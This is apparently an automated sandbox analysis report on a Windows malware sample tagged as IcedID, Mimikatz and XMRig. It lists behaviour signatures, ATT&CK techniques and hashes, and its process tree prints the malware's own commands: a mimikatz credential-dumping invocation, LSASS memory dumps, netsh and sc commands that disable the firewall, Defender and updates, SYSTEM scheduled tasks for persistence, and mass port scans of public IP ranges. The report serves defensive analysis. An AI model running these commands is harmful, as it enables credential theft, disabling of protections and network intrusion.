Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
12-08-2024 07:34
General
-
Target
2024-08-12_87bfcbe0c73ed43e55ed99eb3ed6acb5_hacktools_icedid_mimikatz.exe
-
Size
8.9MB
-
MD5
87bfcbe0c73ed43e55ed99eb3ed6acb5
-
SHA1
0d8129c9803799775d96ee1af6965d82ea7db4e4
-
SHA256
6623b3bdc1659d021cc0e76056b52e8aea711fe2c74adb5a8672c51bd8431651
-
SHA512
839faaca45527a7b8e27a1b7bf75f33e048e4f229ba73868d8138a5fb17436768a8f651bf571369dd108bee390101b481f2f5cc3fa5b46d3f33b34d01036bc8d
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (29226) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 31 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 39 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 49 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\niuaeryvy\nbrbkn.exe"C:\Windows\TEMP\niuaeryvy\nbrbkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-12_87bfcbe0c73ed43e55ed99eb3ed6acb5_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-12_87bfcbe0c73ed43e55ed99eb3ed6acb5_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tlmnbsfy\dbtfmbf.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\tlmnbsfy\dbtfmbf.exeC:\Windows\tlmnbsfy\dbtfmbf.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\tlmnbsfy\dbtfmbf.exeC:\Windows\tlmnbsfy\dbtfmbf.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\intetbmbl\eatelrffa\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\intetbmbl\eatelrffa\wpcap.exeC:\Windows\intetbmbl\eatelrffa\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\intetbmbl\eatelrffa\blzntuqfb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\intetbmbl\eatelrffa\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\intetbmbl\eatelrffa\blzntuqfb.exeC:\Windows\intetbmbl\eatelrffa\blzntuqfb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\intetbmbl\eatelrffa\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\intetbmbl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\intetbmbl\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\intetbmbl\Corporate\vfshost.exeC:\Windows\intetbmbl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vzkmliviy" /ru system /tr "cmd /c C:\Windows\ime\dbtfmbf.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "vzkmliviy" /ru system /tr "cmd /c C:\Windows\ime\dbtfmbf.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iltfyenfl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "iltfyenfl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ytiikbqeb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ytiikbqeb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 792 C:\Windows\TEMP\intetbmbl\792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 392 C:\Windows\TEMP\intetbmbl\392.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 1692 C:\Windows\TEMP\intetbmbl\1692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 2584 C:\Windows\TEMP\intetbmbl\2584.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 2732 C:\Windows\TEMP\intetbmbl\2732.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 2776 C:\Windows\TEMP\intetbmbl\2776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 3116 C:\Windows\TEMP\intetbmbl\3116.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 3844 C:\Windows\TEMP\intetbmbl\3844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 3944 C:\Windows\TEMP\intetbmbl\3944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 4008 C:\Windows\TEMP\intetbmbl\4008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 964 C:\Windows\TEMP\intetbmbl\964.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 1936 C:\Windows\TEMP\intetbmbl\1936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 4264 C:\Windows\TEMP\intetbmbl\4264.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 1996 C:\Windows\TEMP\intetbmbl\1996.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 0 C:\Windows\TEMP\intetbmbl\0.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 5020 C:\Windows\TEMP\intetbmbl\5020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\intetbmbl\eatelrffa\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\intetbmbl\eatelrffa\nanuystbn.exenanuystbn.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 4708 C:\Windows\TEMP\intetbmbl\4708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 4492 C:\Windows\TEMP\intetbmbl\4492.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 1152 C:\Windows\TEMP\intetbmbl\1152.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 3264 C:\Windows\TEMP\intetbmbl\3264.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\gyggue.exeC:\Windows\SysWOW64\gyggue.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\dbtfmbf.exe1⤵
-
C:\Windows\ime\dbtfmbf.exeC:\Windows\ime\dbtfmbf.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\dbtfmbf.exe1⤵
-
C:\Windows\ime\dbtfmbf.exeC:\Windows\ime\dbtfmbf.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.1MB
MD5f9f675548332373c7028837e0546ef96
SHA1b975c1a2173cd3bfb7ad154102588872b12c7a37
SHA2560897027e9132cc056159be1b2551ef0acb08a40147f563edadfb1193428c01c5
SHA51211dacc57135db9288aee8e635c8192a4462bc4bf616969400be5fd4c4b60044cf5d8c9204cfc476c5eb415c352dd35d257f22105255f63b3656cd30c0b4754a4
-
Filesize
25.8MB
MD5118ff03e947c2e540ef17c7698d01772
SHA10750e93b7462f17566fb24039782cb7026b2b88c
SHA2562fb977e341483651818c2017c0c39b9e1c7b05ad58f634c36da269ac1f12111e
SHA512b92fa19c71e0f1219b742b4952f73fd1fc1387eaf2d6dc69c1194b12967d5269cb1a6c2a29f5e3bfd674fab328f621bd705ea8955f9298842ca76f3c3fa373a1
-
Filesize
8.5MB
MD54eb9d9a1a9cacf4a5194e1bf91e7894f
SHA1f1e61e1a16296b404d8975bd668afb2819543907
